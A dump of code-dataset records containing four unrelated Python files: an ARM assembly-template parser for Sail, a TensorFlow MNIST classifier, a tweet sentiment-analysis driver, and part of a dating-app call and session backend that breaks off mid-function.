args1)),\n }\n name = '{}_alternative_{}'.format(enc_name, sanitize('_'.join(args1)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args1, links1)\n\ndef generate_optional_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2):\n els_args1 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children1]\n elements1 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args1])) # flatten\n args1 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args1])) # flatten\n links1 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args1])) # flatten\n\n els_args2 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children2]\n elements2 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args2])) # flatten\n args2 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args2])) # flatten\n links2 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args2])) # flatten\n\n alt_name, alt_args, alt_links = generate_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2)\n\n assert args1 == args2 == alt_args\n # what to do about links? they're almost certainly different\n\n # see if either side has a default\n try:\n default_args = [default_clause(explanations, types, arg, link) for arg, link in zip(args1, links1)]\n values = [\n ('({})'.format(', '.join(default_args)), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args1)), '{}({})'.format(alt_name, ', '.join(args1))),\n ('({})'.format(', '.join(default_args)), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args1)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args1)),\n }\n except NoDefaultException:\n default_args = [default_clause(explanations, types, arg, link) for arg, link in zip(args2, links2)]\n values = [\n ('({})'.format(', '.join(default_args)), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args2)), '{}({})'.format(alt_name, ', '.join(args2))),\n ('({})'.format(', '.join(default_args)), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args2)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args2)),\n }\n name = '{}_optional_{}'.format(enc_name, sanitize('_'.join(args1)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args1, links1)\n\ndef bits_type_to_n(t):\n assert t.startswith('bits(')\n assert t.endswith(')')\n return int(t[5:-1])\n\n# returns (list of sail string, list of arguments for optional, list of links for optional)\ndef process_element(instr_name, enc_name, explanations, types, el):\n if type(el.element) is Token and str(el.element) in '{}()':\n return ([], [])\n elif el.element.name == 'text':\n els = ['\"{}\"'.format(el.string)]\n return (els, [], [])\n elif el.element.name == 'doublespace':\n return (['spc()'], [], [])\n elif el.element.name == 'space':\n return (['def_spc()'], [], [])\n elif el.element.name == 'link':\n link = el.string + '_' + enc_name\n exp = explanations[link]\n if (exp.type == 'asm_immediate' or exp.type == 'asm_signed_immediate'):\n n_bits = get_bitconcat_n_bits(types, exp.props['encoded_in'])\n return (['hex_bits_{}({})'.format(n_bits, exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n # TODO FIXME SIGNED\n # elif exp.type == 'asm_signed_immediate':\n # n_bits = get_bitconcat_n_bits(types, exp.props['encoded_in'])\n # return (['hex_bits_{}({})'.format(n_bits, exp.props['enc\n elif exp.type == 'asm_extendedreg_hack_oneSP_64':\n return (['asm_extendedreg_hack_oneSP_64(Rn, option, Rm, imm3)'], ['Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_twoSP_64':\n return (['asm_extendedreg_hack_twoSP_64(Rd, Rn, option, Rm, imm3)'], ['Rd', 'Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_oneSP_32':\n return (['asm_extendedreg_hack_oneSP_32(Rn, option, Rm, imm3)'], ['Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_twoSP_32':\n return (['asm_extendedreg_hack_twoSP_32(Rd, Rn, option, Rm, imm3)'], ['Rd', 'Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'lsl_shift_hack_32':\n return (['lsl_shift_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsl_shift_hack_64':\n return (['lsl_shift_hack_64(immr, imms)'], ['immr', 'imms'], [link])\n# elif exp.type == 'lsb_width_hack_32':\n# return (['lsb_width_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_width_hack':\n return (['lsb_width_hack(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_mod_hack_32':\n return (['lsb_mod_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_mod_hack_64':\n return (['lsb_mod_hack_64(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'matching_Wn':\n return (['matching_Wn(Rn, Rm)'], ['Rn', 'Rm'], [link])\n elif exp.type == 'matching_Xn':\n return (['matching_Xn(Rn, Rm)'], ['Rn', 'Rm'], [link])\n elif exp.type == 'movewide_imm_hack_32':\n return (['movewide_imm_hack_32(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_imm_hack_64':\n return (['movewide_imm_hack_64(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_inverted_imm_hack_32':\n return (['movewide_inverted_imm_hack_32(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_inverted_imm_hack_64':\n return (['movewide_inverted_imm_hack_64(imm16, hw)'], ['imm16', 'hw'], [link])\n elif 'expr' in exp.props and exp.type == 'asm_constant' and exp.props['expr'] == 'PRESENCE':\n name, args, links = generate_presence_explanation(instr_name, enc_name, explanations, types, el)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif exp.type == 'TABLE':\n return (['{}({})'.format(sanitize(link), exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n else:\n return (['{}({})'.format(exp.type, exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n elif el.element.name == 'bracket_alternative':\n name, args, links = generate_alternative_explanation(instr_name, enc_name, explanations, types, el.children[1].children, el.children[3].children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif el.element.name == 'optional_alternative':\n name, args, links = generate_optional_alternative_explanation(instr_name, enc_name, explanations, types, el.children[1].children, el.children[3].children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif el.element.name == 'optional':\n name, args, links = generate_optional_explanation(instr_name, enc_name, explanations, types, el.children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n else:\n assert False, 'unknown element name in grammar for asm: ' + el.element.name\n\ndef linearize_parse(instr_name, enc_name, explanations, types, parse):\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n elements = [process_element(instr_name, enc_name, explanations, types, el.children[0])[0] for el in start.children]\n return itertools.chain.from_iterable(elements) # flatten\n\n\nasm_rewrites = [\n (r'^([A-Z]+)(\\s+)<(.+?)>\\|#<(.+?)>$', r'\\1\\2(<\\3>|#<\\4>)'), # unbracketed alternatives (DSB etc)\n\n (r'<Xd\\|SP>, <Xn\\|SP>, <R><m>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Xn\\|SP>, <R><m>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Wd\\|WSP>, <Wn\\|WSP>, <Wm>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Wn\\|WSP>, <Wm>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<label>', '<label_hack>'),\n (r'(<systemreg>|S<op0>_<op1>_<Cn>_<Cm>_<op2>)', '<systemreg>'),\n (r'<Ws>, <W\\(s\\+1\\)>', '<casp_hack_ws>'),\n (r'<Wt>, <W\\(t\\+1\\)>', '<casp_hack_wt>'),\n (r'<Xs>, <X\\(s\\+1\\)>', '<casp_hack_xs>'),\n (r'<Xt>, <X\\(t\\+1\\)>', '<casp_hack_xt>'),\n\n (r'^LSL <Wd>, <Wn>, #<shift>$', 'LSL <Wd>, <Wn>, #<lsl_shift_hack>'),\n (r'^LSL <Xd>, <Xn>, #<shift>$', 'LSL <Xd>, <Xn>, #<lsl_shift_hack>'),\n\n (r'^CNEG <Wd>, <Wn>, <cond>$', 'CNEG <Wd>, <matching_Wn>, <cond>'),\n (r'^CNEG <Xd>, <Xn>, <cond>$', 'CNEG <Xd>, <matching_Xn>, <cond>'),\n (r'^CINC <Wd>, <Wn>, <cond>$', 'CINC <Wd>, <matching_Wn>, <cond>'),\n (r'^CINC <Xd>, <Xn>, <cond>$', 'CINC <Xd>, <matching_Xn>, <cond>'),\n (r'^CINV <Wd>, <Wn>, <cond>$', 'CINV <Wd>, <matching_Wn>, <cond>'),\n (r'^CINV <Xd>, <Xn>, <cond>$', 'CINV <Xd>, <matching_Xn>, <cond>'),\n (r'^ROR <Wd>, <Ws>, #<shift>$', 'ROR <Wd>, <matching_Wn>, #<shift>'),\n (r'^ROR <Xd>, <Xs>, #<shift>$', 'ROR <Xd>, <matching_Xn>, #<shift>'),\n\n (r'^BFXIL <Wd>, <Wn>, #<lsb>, #<width>$', 'BFXIL <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^BFXIL <Xd>, <Xn>, #<lsb>, #<width>$', 'BFXIL <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^UBFX <Wd>, <Wn>, #<lsb>, #<width>$', 'UBFX <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^UBFX <Xd>, <Xn>, #<lsb>, #<width>$', 'UBFX <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^UBFIZ <Wd>, <Wn>, #<lsb>, #<width>$', 'UBFIZ <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^UBFIZ <Xd>, <Xn>, #<lsb>, #<width>$', 'UBFIZ <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^SBFX <Wd>, <Wn>, #<lsb>, #<width>$', 'SBFX <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^SBFX <Xd>, <Xn>, #<lsb>, #<width>$', 'SBFX <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^SBFIZ <Wd>, <Wn>, #<lsb>, #<width>$', 'SBFIZ <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^SBFIZ <Xd>, <Xn>, #<lsb>, #<width>$', 'SBFIZ <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^BFC <Wd>, #<lsb>, #<width>$', 'BFC <Wd>, <lsb_width_hack>'),\n (r'^BFC <Xd>, #<lsb>, #<width>$', 'BFC <Xd>, <lsb_width_hack>'),\n (r'^BFI <Wd>, <Wn>, #<lsb>, #<width>$', 'BFI <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^BFI <Xd>, <Xn>, #<lsb>, #<width>$', 'BFI <Xd>, <Xn>, <lsb_width_hack>'),\n\n]\nasm_rewrites = [(re.compile(regex), rep) for regex, rep in asm_rewrites]\n\n\ndef read_asm_encoding(name, explanations, types, xml):\n elements = []\n enc_name = xml.get('name')\n orig_template = template = ''.join(xml.find('asmtemplate').itertext())\n\n for regex, rep in asm_rewrites:\n template = regex.sub(rep, template)\n\n # hack for packed (imm+shift) immediates in MOV aliases\n if enc_name in ('MOV_MOVZ_32_movewide', 'MOV_MOVZ_64_movewide',\n 'MOV_MOVN_32_movewide', 'MOV_MOVN_64_movewide'):\n template = re.sub(r'^MOV <(Xd|Wd)>, #<imm>$', r'MOV <\\1>, #<movewide_imm_hack>', template)\n\n parse = asm_grammar.parse(template)\n assert parse.is_valid\n return (xml.get('bitdiffs'), ' ^ '.join(linearize_parse(name, enc_name, explanations, types, parse)))\n","sub_path":"bin/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":23169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368484810","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nfrom tensorflow.keras.datasets import mnist\r\nfrom tensorflow.keras.utils import to_categorical\r\n\r\n#1. DATA\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\nx_train = x_train.reshape(-1, 28*28).astype('float32')/255\r\nx_test = x_test.reshape(-1, 28*28).astype('float32')/255\r\n\r\n\r\nx = tf.placeholder('float', [None, 784])\r\ny = tf.placeholder('float', [None, 10])\r\n\r\nw = tf.Variable(tf.random_normal([784, 10]), name = 'weight')\r\nb = tf.Variable(tf.random_normal([10]), name = 'bias')\r\n\r\n#2. MODEL\r\nhypothesis = tf.nn.softmax(tf.matmul(x, w) + b)\r\n\r\n#binary_crossentropy\r\ncost = tf.reduce_mean(-tf.reduce_sum(y * tf.log(hypothesis), axis = 1))\r\n\r\noptimizer = tf.train.AdamOptimizer(learning_rate = 0.1).minimize(cost)\r\n\r\nwith tf.Session() as sess :\r\n sess.run(tf.global_variables_initializer())\r\n \r\n for step in range(2001) :\r\n _, cost_val = sess.run([optimizer, cost], feed_dict={x : x_train, y: y_train})\r\n\r\n if step % 200 == 0 :\r\n print(step, \"[loss] : \", cost_val)\r\n\r\n a = sess.run(hypothesis, feed_dict={x : x_test})\r\n print(\"acc : \", accuracy_score(sess.run(tf.argmax(y_test, 1)), sess.run(tf.argmax(a, 1))))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"tf114/tf16_mnist2.py","file_name":"tf16_mnist2.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"7571360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport pickle\nimport nltk\nimport MachineLearning, TaggerTrainer, PreProcess_helper\nfrom Corpus import get_corpus\nimport pandas as pd\n\n# Obtenemos los parametros pasados al script\n# Obtenemos los argumentos de la linea de comandos\nv = 0 # Verbose\na = None # Algoritmo\nt = 1 # Entrenamiento\ncC = 500 # Corte del corpus\ntG = 0 # Activacion del tagger\ntT = 0 # Entrenamiento del tagger\npR = 0 # Activación preprocesamiento\nnT = 1 # Treshold negacion\n\noptions = ['-v', '-a', '-t', '-sW', '-cC', '-tg', '-pr', '-nt', '-h']\nif len(sys.argv) >= 2:\n if '-v' in sys.argv:\n # Nivel de 'verbose' del programa\n v = int(sys.argv[sys.argv.index('-v')+1])\n if '-a' in sys.argv:\n # Algoritmo a usar\n # maxEnt => maxEnt propio\n # skLearn => clasificación mediante libreria sickit learn\n a = sys.argv[sys.argv.index('-a')+1]\n if '-t' in sys.argv:\n # Necesidad de entrenamiento, 0 o 1, 1 por defecto\n t = int(sys.argv[sys.argv.index('-t')+1])\n if '-sW' in sys.argv:\n # download stopwords\n nltk.download(\"stopwords\")\n if '-cC' in sys.argv:\n # Cantidad de features en la lista\n cC = int(sys.argv[sys.argv.index('-cC')+1])\n if '-tg' in sys.argv:\n # Activación del tagger\n tG = 1\n if '-tt' in sys.argv:\n # Entrenamiento del tagger\n tT = 1\n if '-pr' in sys.argv:\n # Activación preprocesado\n pR = int(sys.argv[sys.argv.index('-pr')+1])\n if '-nt' in sys.argv:\n # Treshold de la negacion\n if sys.argv[sys.argv.index('-nt')+1] not in options:\n nT = int(sys.argv[sys.argv.index('-nt')+1])\n if '-h' in sys.argv:\n print(\"Lista de comandos:\")\n print(\" -v > verbose (1...n)\")\n print(\" -tg > realizar tagging del corpus\")\n print(\" -pr > realizar preprocesado [1 | 2 | 3]\"\n \"\\n 1 > process_tweet\"\n \"\\n 2 > replace two or moe\"\n \"\\n 3 > dos metodos anteriores\")\n print(\" -nt > treshold para modificar las negaciones [1...n] 'no está bien' con nt 2 -> 'no está !bien'\"\n \"\\nSi no se especifica se modifica la palabra inmediatamente posterior.\")\n print(\" -a > algoritmo: [maxEnt | SVC]\")\n print(\" -t > entrenamiento [0|1]\")\n print(\" -sW > descargar stopwords\")\n print(\" -h > help\")\n\ntagger = None\nif tG == 1 or tT == 1:\n # Entrenamiento del tagger\n try:\n print(\"#Cargando el tagger entrenado...\") if v >= 1 else None\n f1 = open('data/tagger/tnt_pos_tagger.pickle', 'rb')\n tagger = pickle.load(f1)\n f1.close()\n except Exception as e:\n print('error: ', e) if v >= 2 else None\n # Entrenamiento tagger\n if tT == 1:\n print(\"No se ha encontrado el archivo! Se procede al entrenamiento...\") if v >= 1 else None\n tt = TaggerTrainer.Tagger(10000, 0, v)\n tagger = tt.train_tnt()\n tt.save_tagger(tagger)\n\n# Obtenemos el cuerpo de los datos, si tagger es none se compone el corpus normal, si no se etiqueta\ntweets_corpus = get_corpus(v, tagger)\n\n# Preprocesamiento\nif pR >= 1 or tG == 1:\n # Realizamos preprocesado de los textos\n p_helper = PreProcess_helper.Preprocesshelper()\n print(\"#Preprocesando los datos...\") if v >= 1 else None\n for tweet in tweets_corpus.content:\n print(tweet) if v >= 4 else None\n if tG == 1:\n # Se realizan operaciones con los tags y se recompone el corpus procesado\n p_helper.process_tags(tweet, nT, v)\n\nif a is not None:\n # instanciacion de la clase para la ejecució n de los algoritmos\n machineLearning = MachineLearning.MachineLearning(tweets_corpus, v)\n machineLearning.binarize()\n\n# Comprobación algoritmo a usar\nif a == 'maxEnt':\n machineLearning.param_searchLR()\n machineLearning.print_paramLR() if v >= 2 else None\nif a == 'SVC':\n machineLearning.param_searchSVC()\n machineLearning.print_paramSVC() if v >= 2 else None","sub_path":"AnalysisCV/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442001518","text":"import json\nimport jenkins\nimport pymongo\nfrom classes.mongo import db\nfrom bson.objectid import ObjectId\nfrom APNSWrapper import *\nfrom datetime import datetime, date\nfrom random import randrange\nfrom classes.json_serializer import JsonSerializer\nfrom classes.send_mail import SendMail\nimport binascii\nfrom dateutil.relativedelta import relativedelta\n\n\nclass BusinessProvider:\n def __init__(self):\n pass\n\n def initiate_call(self, user_info, request_data):\n user_id = user_info[\"id\"]\n user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)})\n if not user_info:\n raise Exception(\"caller user_id: [{0}] does not exist\".format(user_id))\n db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"busy\"}})\n if request_data[\"to_user_id\"] is False:\n user_info_to_call = self.__find_user_to_call(user_info)\n if not user_info_to_call:\n db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n raise Exception(\"no one to call\")\n else:\n user_info_to_call = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"to_user_id\"])})\n if not user_info_to_call:\n db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n raise Exception(\"destination user_id: [{0}] does not exist\".format(request_data[\"to_user_id\"]))\n session_id = self.__calculate_session_id(str(user_info[\"_id\"]), str(user_info_to_call[\"_id\"]))\n session_info = db.tow.sessions.find_one({\"session_id\": session_id})\n if session_info:\n self.__reset_session(session_id, user_info[\"_id\"], user_info_to_call[\"_id\"])\n else:\n self.__insert_session(session_id, user_info[\"_id\"], user_info_to_call[\"_id\"])\n user_age = self.__calculate_user_age(user_info)\n push_text = \"Incoming call from {0} {1}, {2}\".format(user_info[\"first_name\"], user_info[\"last_name\"], user_age)\n push_object = \\\n {\n \"session_id\": session_id,\n \"date_created\": datetime.utcnow(),\n \"session_timeout\": 30\n }\n if user_info_to_call.get(\"mobile_id\", False) is not False:\n self.__send_push_notification(user_info_to_call[\"mobile_id\"], push_text, data=push_object, use_sound=True)\n result = \\\n {\n \"session_id\": session_id,\n \"session_timeout\": 45,\n \"user_info\": {\n \"first_name\": user_info_to_call[\"first_name\"],\n \"last_name\": user_info_to_call[\"last_name\"],\n \"picture\": \"http://graph.facebook.com/{0}/picture?type=large\".format(\n user_info_to_call[\"facebook_id\"]),\n \"user_id\": str(user_info_to_call[\"_id\"]),\n \"gender\": user_info_to_call[\"gender\"],\n \"age\": self.__calculate_user_age(user_info_to_call),\n \"location\": user_info_to_call.get(\"hometown\", {}).get(\"name\", \"\"),\n \"distance\": randrange(100),\n \"likes\": user_info_to_call.get(\"likes\", [])\n },\n \"stages_info\": {\n \"first_stage_length\": 30,\n \"second_stage_length\": 30,\n \"third_stage_length\": 30,\n \"stage_timeout\": 20\n }\n }\n return result\n\n def receive_call(self, request_data):\n session_info = db.tow.sessions.find_one({\"session_id\": request_data[\"session_id\"]})\n if not session_info:\n raise Exception(\"session_id: [{0}] not found\".format(request_data[\"session_id\"]))\n from_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_1\"]})\n result = \\\n {\n \"session_id\": request_data[\"session_id\"],\n \"session_timeout\": 45,\n \"user_info\": {\n \"first_name\": from_user_info[\"first_name\"],\n \"last_name\": from_user_info[\"last_name\"],\n \"picture\": \"http://graph.facebook.com/{0}/picture?type=large\".format(\n from_user_info[\"facebook_id\"]),\n \"user_id\": str(from_user_info[\"_id\"]),\n \"gender\": from_user_info[\"gender\"],\n \"age\": self.__calculate_user_age(from_user_info),\n \"location\": from_user_info.get(\"hometown\", {}).get(\"name\", \"\"),\n \"distance\": randrange(100),\n \"likes\": from_user_info.get(\"likes\", [])\n },\n \"stages_info\": {\n \"first_stage_length\": 30,\n \"second_stage_length\": 30,\n \"third_stage_length\": 30,\n \"stage_timeout\": 20\n }\n }\n return result\n\n def sync_call(self, user_info, request_data):\n session_params = request_data\n session_info = db.tow.sessions.find_one({\"session_id\": session_params[\"session_id\"]})\n if not session_info:\n raise Exception(\"session_id: [{0}] does not exist\".format(session_params[\"session_id\"]))\n current_user = \"user_1\" if str(session_info[\"user_1\"]) == user_info[\"id\"] else \"user_2\"\n other_user = \"user_1\" if str(session_info[\"user_2\"]) == user_info[\"id\"] else \"user_2\"\n session_info[\"{0}_is_connected_to_twillio\".format(current_user)] = session_params[\"is_connected_to_twillio\"]\n session_info[\"{0}_is_alive\".format(current_user)] = session_params[\"is_alive\"]\n session_info[\"{0}_is_first_stage_ok\".format(current_user)] = session_params[\"is_first_stage_ok\"]\n session_info[\"{0}_is_second_stage_ok\".format(current_user)] = session_params[\"is_second_stage_ok\"]\n session_info[\"{0}_is_third_stage_ok\".format(current_user)] = session_params[\"is_third_stage_ok\"]\n session_info[\"{0}_is_hanged_up\".format(current_user)] = session_params[\"is_hanged_up\"]\n session_info[\"{0}_is_hold\".format(current_user)] = session_params[\"is_hold\"]\n other_user_is_connected_to_twillio = session_info[\"{0}_is_connected_to_twillio\".format(other_user)]\n other_user_is_alive = session_info[\"{0}_is_alive\".format(other_user)]\n other_user_is_first_stage_ok = session_info[\"{0}_is_first_stage_ok\".format(other_user)]\n other_user_is_second_stage_ok = session_info[\"{0}_is_second_stage_ok\".format(other_user)]\n other_user_is_third_stage_ok = session_info[\"{0}_is_third_stage_ok\".format(other_user)]\n # other_user_is_hanged_up = session_info[\"{0}_is_hanged_up\".format(other_user)]\n # other_user_is_hold = session_info[\"{0}_is_hold\".format(other_user)]\n session_info[\"is_connected_to_twillio\"] = \\\n session_params[\"is_connected_to_twillio\"] and other_user_is_connected_to_twillio\n session_info[\"is_alive\"] = session_params[\"is_alive\"] and other_user_is_alive\n session_info[\"is_first_stage_ok\"] = session_params[\"is_first_stage_ok\"] and other_user_is_first_stage_ok\n session_info[\"is_second_stage_ok\"] = session_params[\"is_second_stage_ok\"] and other_user_is_second_stage_ok\n session_info[\"is_third_stage_ok\"] = session_params[\"is_third_stage_ok\"] and other_user_is_third_stage_ok\n if session_params[\"is_hanged_up\"]:\n session_info[\"is_hanged_up\"] = True\n db.tow.users.update({\"_id\": session_info[\"user_1\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n db.tow.users.update({\"_id\": session_info[\"user_2\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n if current_user == \"user_1\" and session_info[\"is_alive\"] is False:\n caller_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_2\"]})\n calling_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_1\"]})\n calling_user_age = self.__calculate_user_age(calling_user_info)\n push_text = \"Missed call from {0}, {1}\".format(calling_user_info[\"first_name\"], calling_user_age)\n if caller_user_info.get(\"mobile_id\", False) is not False:\n self.__send_push_notification(caller_user_info[\"mobile_id\"], push_text)\n if session_params[\"is_hold\"]:\n session_info[\"is_hold\"] = True\n session_info[\"date_modified\"] = datetime.utcnow()\n session_info.pop(\"_id\")\n db.tow.sessions.update({\"session_id\": session_info[\"session_id\"]}, {\"$set\": session_info})\n result = \\\n {\n \"is_connected_to_twillio\": session_info[\"is_connected_to_twillio\"],\n \"is_alive\": session_info[\"is_alive\"],\n \"is_first_stage_ok\": session_info[\"is_first_stage_ok\"],\n \"is_second_stage_ok\": session_info[\"is_second_stage_ok\"],\n \"is_third_stage_ok\": session_info[\"is_third_stage_ok\"],\n \"is_hanged_up\": session_info[\"is_hanged_up\"],\n \"is_hold\": session_info[\"is_hold\"]\n }\n return result\n\n def set_user_settings(self, user_info, request_data):\n request_data[\"date_modified\"] = datetime.utcnow()\n user_settings = self.__add_dictionary_keys_prefix(request_data, \"settings.\")\n db.tow.users.update({\"_id\": ObjectId(user_info[\"id\"])}, {\"$set\": user_settings})\n return {\"result\": \"ok\"}\n\n def set_global_settings(self, request_data):\n settings = db.tow.settings.find_one({}, {\"_id\": 1})\n if settings:\n request_data[\"date_modified\"] = datetime.utcnow()\n db.tow.settings.update({\"_id\": settings[\"_id\"]}, {\"$set\": request_data})\n else:\n request_data[\"date_created\"] = datetime.utcnow()\n request_data[\"date_modified\"] = datetime.utcnow()\n db.tow.settings.insert(request_data)\n return {\"result\": \"ok\"}\n\n def get_user_settings(self, user_info):\n user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])}, {\"_id\": 0, \"settings\": 1})\n if not user_info:\n raise Exception(\"user_id: [{0}] does not exist\".format(user_info[\"id\"]))\n user_info[\"settings\"].pop(\"date_modified\")\n return user_info[\"settings\"]\n\n def get_global_settings(self):\n settings = db.tow.settings.find_one({}, {\"_id\": 0, \"date_created\": 0, \"date_modified\": 0})\n if settings:\n return settings\n raise Exception(\"global settings undefined\")\n\n def get_user_profile_pictures(self, user_info):\n user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])}, {\"_id\": 0, \"pictures\": 1})\n if not user_info:\n raise Exception(\"user_id: [{0}] does not exist\".format(user_info[\"id\"]))\n return user_info[\"pictures\"]\n\n def get_all_users(self, user_info, request_data):\n if request_data[\"filter\"] is False:\n all_users = db.tow.users.find({\"_id\": {\"$ne\": ObjectId(user_info[\"id\"])}},\n {\"name\": 1, \"settings\": 1}).limit(int(request_data[\"limit\"]))\n else:\n user_id = user_info[\"id\"]\n user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)})\n all_users = self.__find_user_to_call(user_info, limit=int(request_data[\"limit\"]))\n if all_users:\n all_users = list(all_users)\n return all_users if all_users else []\n\n def set_location(self, user_info, request_data):\n geo_json = \\\n {\n \"type\": \"Point\",\n \"coordinates\": [request_data[\"long\"], request_data[\"lat\"]]\n }\n db.tow.users.update({\"_id\": ObjectId(user_info[\"id\"])}, {\"$set\": {\"geo_location\": geo_json}})\n return {\"result\": \"ok\"}\n\n def send_facebook_data(self, user_info, request_data):\n from_user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])})\n if not from_user_info:\n raise Exception(\"from_user_info: [{0}] does not exist\".format(from_user_info[\"id\"]))\n to_user_info = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"to_user_id\"])})\n if not to_user_info:\n raise Exception(\"to_user_info: [{0}] does not exist\".format(to_user_info[\"id\"]))\n text = \"Hi, we have tallked on ToW, my name is: [{0}] and my facebook is: \" \\\n \"<a href='http://www.facebook.com/{1}'>Facebook</a>, lets fuck !\" \\\n .format(from_user_info[\"name\"], from_user_info[\"facebook_id\"])\n send_mail = SendMail()\n send_mail.send_mail(to_user_info[\"email\"], \"notifications@talkorwalkapp.com\", \"TalkOrWalk\", text)\n return {\"result\": \"ok\"}\n\n def set_report_person(self, user_info, request_data):\n from_user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])})\n if not from_user_info:\n raise Exception(\"from_user_info: [{0}] does not exist\".format(user_info[\"id\"]))\n to_user_info = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"user_to_report\"])})\n if not to_user_info:\n raise Exception(\"from_user_info: [{0}] does not exist\".format(request_data[\"user_to_report\"]))\n reason = request_data.get(\"reason\", \"\")\n report = \\\n {\n \"from_user_id\": from_user_info[\"_id\"],\n \"from_user_name\": from_user_info[\"name\"],\n \"date_created\": datetime.now(),\n \"reason\": reason\n }\n db.tow.users.update({\"_id\": to_user_info[\"_id\"]}, {\"$push\": {\"reports\": report}})\n return {\"result\": \"ok\"}\n\n def set_call_rating(self, user_info, request_data):\n session_info = db.tow.sessions.find_one({\"session_id\": request_data[\"session_id\"]},\n {\"_id\": 0, \"user_1\": 1, \"user_2\": 1})\n if not session_info:\n raise Exception(\"session_id: [{0}] not found\".format(request_data[\"session_id\"]))\n if str(session_info[\"user_1\"]) == user_info[\"id\"]:\n current_user = \"user_1\"\n elif str(session_info[\"user_2\"]) == user_info[\"id\"]:\n current_user = \"user_2\"\n else:\n raise Exception(\"user_id: [{0}] does not belong to session\".format(user_info[\"id\"]))\n session_info[\"{0}_rating\".format(current_user)] = \\\n {\n \"rating\": request_data[\"rating\"],\n \"date_created\": 